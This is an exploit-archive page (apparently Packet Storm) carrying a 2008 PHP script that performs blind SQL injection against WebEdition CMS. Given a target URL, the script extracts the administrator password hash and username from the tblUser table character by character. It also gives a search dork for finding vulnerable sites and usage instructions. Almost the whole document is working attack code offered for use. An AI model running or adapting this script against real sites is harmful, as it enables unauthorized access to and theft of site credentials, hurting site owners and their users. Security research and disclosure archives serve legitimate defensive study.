exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

webeditioncms-sql.txt

webeditioncms-sql.txt
Posted Aug 21, 2008
Authored by Lidloses_Auge

WebEdition CMS remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | f4e336b97d81ee997f08ba1d74076efb12d42a8d60cea9563e073bb56ac4931c

webeditioncms-sql.txt

Change Mirror Download
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# WebEdition CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Special Greetz to: H4x0r007 (who sent me a vulnerable Page)
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack, Ciphercrew, h4ck-y0u
# Date: 20.08.2008
#
###############################################################
#
# Dork: inurl:we_objectID=
# Admin Panel: [Target]/webEdition/
# Usage: php '.$argv[0].' [Target] [Userid]
# Example for http://www.site.com/en/****.php?we_objectID=21
# => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
#
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url."'and+1=1/*"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."'and+1=0/*"));
$t = abs((100-($w/$r*100)));
echo "Password: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
echo "\nUsername: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}

} else {
echo "\nExploiting failed: Not enough arguments?\n";
}
?>

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close